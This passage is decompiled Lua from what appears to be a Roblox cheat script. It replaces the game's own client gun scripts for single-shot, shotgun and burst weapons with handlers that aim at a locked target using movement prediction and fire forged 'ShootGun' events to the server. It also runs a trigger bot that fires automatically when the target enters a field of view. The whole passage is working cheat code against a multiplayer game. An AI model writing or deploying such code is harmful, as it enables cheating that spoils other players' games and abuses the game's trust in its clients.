							if v229["Enabled"] == false or v_u_182(v224.HumanoidRootPart.CFrame, v232) then
								local v233 = v_u_191(v_u_92.Target)
								local v234 = v_u_106()
								v222 = Vector3.new(v226.X + v233.X * v234.X, v226.Y + v233.Y * v234.Y, v226.Z + v233.Z * v234.Z)
								print("Updated destination: " .. tostring(v222))
							end
						end
					end
					return (v222 - p221).Unit
				end
			}
			local function v291(p236)
				-- upvalues: (ref) v_u_92, (ref) v_u_85, (ref) v_u_87, (copy) v_u_235
				if v_u_92.CurrentCharacter ~= p236 then
					print("Character has been added")
					v_u_92.CurrentCharacter = p236
					p236.ChildAdded:Connect(function(p_u_237)
						-- upvalues: (ref) v_u_92, (ref) v_u_85, (ref) v_u_87, (ref) v_u_235
						print("ChildAdded: " .. p_u_237.Name .. " | Class: " .. p_u_237.ClassName)
						if v_u_92.Overwritten[p_u_237] == nil then
							v_u_92.Overwritten[p_u_237] = true
							if p_u_237:FindFirstChild("GunClient") then
								print("Overwriting: " .. p_u_237.Name .. " ( One Bullet )")
								p_u_237.GunClient:Destroy()
								local v_u_238 = CFrame.new(-1, 0.4, 0)
								local v_u_239 = p_u_237:WaitForChild("Handle")
								local v_u_240 = v_u_85.LocalPlayer.Character
								local _ = p_u_237.Handle.ShootSound
								local v_u_241 = p_u_237.Ammo
								local v_u_242 = p_u_237:WaitForChild("Range")
								local v_u_243 = p_u_237:WaitForChild("ShootingCooldown").Value
								local v_u_244 = require(v_u_87.Modules.GunHandler)
								local v_u_245 = require(v_u_87.Modules.Maid).new()
								local v_u_246 = p_u_237:WaitForChild("RemoteEvent", 2) or {
									["FireServer"] = function(_, _) end
								}
								v_u_245:GiveTask(p_u_237.AncestryChanged:Connect(function()
									-- upvalues: (copy) p_u_237, (copy) v_u_240, (ref) v_u_85, (copy) v_u_245
									if p_u_237.Parent ~= v_u_240 and p_u_237.Parent ~= v_u_85.LocalPlayer:FindFirstChildWhichIsA("Backpack") then
										print("Cleaning up connections :)")
										v_u_245:DoCleaning()
									end
								end))
								local v_u_247 = 0
								v_u_245:GiveTask(p_u_237.Activated:Connect(function()
									-- upvalues: (ref) v_u_247, (copy) v_u_243, (copy) v_u_241, (copy) v_u_244, (copy) v_u_240, (copy) v_u_246, (copy) v_u_239, (copy) v_u_238, (copy) p_u_237, (ref) v_u_235, (copy) v_u_242, (ref) v_u_87
									if tick() - v_u_247 >= v_u_243 + 0.02 and (v_u_241.Value >= 1 and (not _G.GUN_COMBAT_TOGGLE and v_u_244.getCanShoot(v_u_240))) then
										v_u_247 = tick()
										v_u_246:FireServer("Shoot")
										local v248 = (v_u_239.CFrame * v_u_238).Position
										local v249 = p_u_237:FindFirstChild("Default") and (p_u_237.Default:FindFirstChild("Mesh") and p_u_237.Default.Mesh:FindFirstChild("Muzzle"))
										if not v249 then
											v249 = {
												["WorldPosition"] = v248
											}
										end
										local v250 = v249.WorldPosition + v_u_235.getAim(v249.WorldPosition) * 200
										local v251, v252, v253 = v_u_244.shoot({
											["Shooter"] = v_u_240,
											["Handle"] = v_u_239,
											["ForcedOrigin"] = v248,
											["AimPosition"] = v250,
											["BeamColor"] = Color3.new(1, 0.545098, 0.14902),
											["Range"] = v_u_242.Value
										})
										v_u_87.MainEvent:FireServer("ShootGun", v_u_239, v249.WorldPosition, v251, v252, v253)
										v_u_246:FireServer()
									end
								end))
							end
							if p_u_237:FindFirstChild("GunClientShotgun") then
								print("Overwriting: " .. p_u_237.Name .. " ( Shotgun )")
								p_u_237.GunClientShotgun:Destroy()
								local v_u_254 = v_u_92["Shotguns"][p_u_237.Name].Bullets
								local v_u_255 = v_u_92["Shotguns"][p_u_237.Name].Offset
								local v_u_256 = p_u_237:WaitForChild("Handle")
								local v_u_257 = v_u_85.LocalPlayer.Character
								local _ = p_u_237.Handle.ShootSound
								local v_u_258 = p_u_237.Ammo
								local v_u_259 = p_u_237:WaitForChild("Range")
								local v_u_260 = p_u_237:WaitForChild("ShootingCooldown").Value
								local v_u_261 = require(v_u_87.Modules.GunHandler)
								local v_u_262 = require(v_u_87.Modules.Maid).new()
								local v_u_263 = p_u_237:WaitForChild("RemoteEvent", 2) or {
									["FireServer"] = function(_, _) end
								}
								v_u_262:GiveTask(p_u_237.AncestryChanged:Connect(function()
									-- upvalues: (copy) p_u_237, (copy) v_u_257, (ref) v_u_85, (copy) v_u_262
									if p_u_237.Parent ~= v_u_257 and p_u_237.Parent ~= v_u_85.LocalPlayer:FindFirstChildWhichIsA("Backpack") then
										print("Cleaning up connections :)")
										v_u_262:DoCleaning()
									end
								end))
								local v_u_264 = 0
								v_u_262:GiveTask(p_u_237.Activated:Connect(function()
									-- upvalues: (ref) v_u_264, (copy) v_u_260, (copy) v_u_258, (copy) v_u_261, (copy) v_u_257, (copy) v_u_263, (copy) v_u_254, (copy) v_u_256, (copy) v_u_255, (copy) p_u_237, (ref) v_u_235, (copy) v_u_259, (ref) v_u_87
									if tick() - v_u_264 >= v_u_260 + 0.0095 + 0.05 and (v_u_258.Value >= 1 and (not _G.GUN_COMBAT_TOGGLE and v_u_261.getCanShoot(v_u_257))) then
										v_u_264 = tick()
										v_u_263:FireServer("Shoot")
										local v265 = workspace:GetServerTimeNow()
										for _ = 1, v_u_254 do
											local v266 = Vector3.new(math.random() > 0.5 and math.random() * 0.05 or -math.random() * 0.05, math.random() > 0.5 and math.random() * 0.1 or -math.random() * 0.1, math.random() > 0.5 and math.random() * 0.05 or -math.random() * 0.05)
											local v267 = (v_u_256.CFrame * v_u_255).Position
											local v268 = p_u_237:FindFirstChild("Default") and (p_u_237.Default:FindFirstChild("Mesh") and p_u_237.Default.Mesh:FindFirstChild("Muzzle")) or {
												["WorldPosition"] = v267
											}
											local v269 = v268.WorldPosition + (v_u_235.getAim(v268.WorldPosition) + v266) * v_u_259.Value
											local v270, v271, v272 = v_u_261.shoot({
												["Shooter"] = v_u_257,
												["Handle"] = v_u_256,
												["ForcedOrigin"] = v267,
												["AimPosition"] = v269,
												["BeamColor"] = Color3.new(1, 0.545098, 0.14902),
												["Range"] = v_u_259.Value
											})
											v_u_87.MainEvent:FireServer("ShootGun", v_u_256, v268.WorldPosition, v270, v271, v272, v265)
										end
										v_u_263:FireServer()
									end
								end))
							end
						end
						if p_u_237:FindFirstChild("GunClientBurst") then
							print("Overwriting: " .. p_u_237.Name .. " ( Burst )")
							p_u_237.GunClientBurst:Destroy()
							local v_u_273 = CFrame.new(-0.1, 0.4, 1.8)
							local v_u_274 = p_u_237:WaitForChild("Handle")
							local v_u_275 = v_u_85.LocalPlayer.Character
							local _ = p_u_237.Handle.ShootSound
							local v_u_276 = p_u_237.Ammo
							local v_u_277 = p_u_237:WaitForChild("Range")
							local v_u_278 = p_u_237:WaitForChild("ShootingCooldown").Value
							local v_u_279 = p_u_237:WaitForChild("ToleranceCooldown").Value
							local v_u_280 = require(v_u_87.Modules.GunHandler)
							local v_u_281 = require(v_u_87.Modules.Maid).new()
							local v_u_282 = p_u_237:WaitForChild("RemoteEvent", 2) or {
								["FireServer"] = function(_, _) end
							}
							v_u_281:GiveTask(p_u_237.AncestryChanged:Connect(function()
								-- upvalues: (copy) p_u_237, (copy) v_u_275, (ref) v_u_85, (copy) v_u_281
								if p_u_237.Parent ~= v_u_275 and p_u_237.Parent ~= v_u_85.LocalPlayer:FindFirstChildWhichIsA("Backpack") then
									print("Cleaning up connections :)")
									v_u_281:DoCleaning()
								end
							end))
							local v_u_283 = 0
							v_u_281:GiveTask(p_u_237.Activated:Connect(function()
								-- upvalues: (ref) v_u_283, (copy) v_u_279, (copy) v_u_280, (copy) v_u_275, (copy) v_u_282, (copy) v_u_276, (copy) v_u_274, (copy) v_u_273, (copy) p_u_237, (ref) v_u_235, (copy) v_u_277, (ref) v_u_87, (copy) v_u_278
								if tick() - v_u_283 >= v_u_279 and (not _G.GUN_COMBAT_TOGGLE and v_u_280.getCanShoot(v_u_275)) then
									v_u_283 = tick()
									v_u_282:FireServer("Shoot")
									local v_u_284 = workspace:GetServerTimeNow()
									task.spawn(function()
										-- upvalues: (ref) v_u_276, (ref) v_u_274, (ref) v_u_273, (ref) p_u_237, (ref) v_u_235, (ref) v_u_280, (ref) v_u_275, (ref) v_u_277, (ref) v_u_87, (copy) v_u_284, (ref) v_u_278, (ref) v_u_282
										for _ = 1, v_u_276.Value > 3 and 3 or v_u_276.Value do
											local v285 = (v_u_274.CFrame * v_u_273).Position
											local v286 = p_u_237:FindFirstChild("Default") and (p_u_237.Default:FindFirstChild("Mesh") and p_u_237.Default.Mesh:FindFirstChild("Muzzle")) or {
												["WorldPosition"] = v285
											}
											local v287 = v286.WorldPosition + v_u_235.getAim(v286.WorldPosition) * 200
											local v288, v289, v290 = v_u_280.shoot({
												["Shooter"] = v_u_275,
												["Handle"] = v_u_274,
												["ForcedOrigin"] = v285,
												["AimPosition"] = v287,
												["BeamColor"] = Color3.new(1, 0.545098, 0.14902),
												["Range"] = v_u_277.Value
											})
											v_u_87.MainEvent:FireServer("ShootGun", v_u_274, v286.WorldPosition, v288, v289, v290, v_u_284)
											task.wait(v_u_278 + 0.0095)
										end
										v_u_282:FireServer()
									end)
									v_u_282:FireServer()
								end
							end))
						end
					end)
				end
			end
			if v_u_85.LocalPlayer.Character then
				v291(v_u_85.LocalPlayer.Character)
			end
			v_u_85.LocalPlayer.CharacterAdded:Connect(v291)
			
			task.spawn(function()
				-- upvalues: (ref) v_u_69, (ref) v_u_92, (ref) v_u_84, (ref) v_u_191, (ref) v_u_182, (ref) v_u_105, (ref) v_u_85, (ref) v_u_91
				if v_u_69["Trigger Bot"]["Enabled"] and v_u_92.Target and (v_u_69["Trigger Bot"]["Activation"]["Activation Mode"] == "Hold" and v_u_84:IsKeyDown(Enum.KeyCode[v_u_69["Trigger Bot"]["Activation"]["Activation Bind"]]) or (v_u_69["Trigger Bot"]["Activation"]["Activation Mode"] == "Always" or v_u_69["Trigger Bot"]["Activation"]["Activation Mode"] == "Toggle" and v_u_92["Triggerbot"]["Key Toggled"])) then
					local v292 = v_u_69["Trigger Bot"]["FOV"]
					local v293 = Vector3.new(v292.X, v292.Y, v292.Z)
					local v294 = v_u_92.Target.Character.HumanoidRootPart.CFrame
					local v295 = v_u_191(v_u_92.Target)
					local v296 = Vector3.new(v294.X + v295.X * v_u_69["Trigger Bot"]["Prediction"].X, v294.Y + v295.Y * v_u_69["Trigger Bot"]["Prediction"].Y, v294.Z + v295.Z * v_u_69["Trigger Bot"]["Prediction"].Z)
					if tick() - v_u_92["Triggerbot"]["Last Click"] >= v_u_69["Trigger Bot"]["Click Cooldown"] and (v_u_182(CFrame.new(v296), v293) and v_u_105(v_u_92.Target.Character.Head.Position, { v_u_92.Target.Character, v_u_85.LocalPlayer.Character, v_u_91 })) then
						local v297 = v_u_85.LocalPlayer.Character:FindFirstChildWhichIsA("Tool")
						if table.find(v_u_69["Trigger Bot"]["Weapons"], v297.Name) then
							v297:Activate()
							v_u_92["Triggerbot"]["Last Click"] = tick()
						end
					end
				end
			end)
			task.spawn(function()
				-- upvalues: (ref) v_u_92, (ref) v_u_112, (ref) v_u_69, (ref) v_u_185
				if v_u_92.Target and v_u_112(v_u_92.Target, v_u_69["Global"]["Check"]["Whilst a player is selected"]) == false then
					v_u_92.Target = nil
					v_u_185("Health Changed")
				end
			end)
			task.spawn(function()
				-- upvalues: (ref) v_u_69
				if shared.Saved and v_u_69 ~= shared.Saved then
					v_u_69 = shared.Saved
				end
			end)
		end)
	end
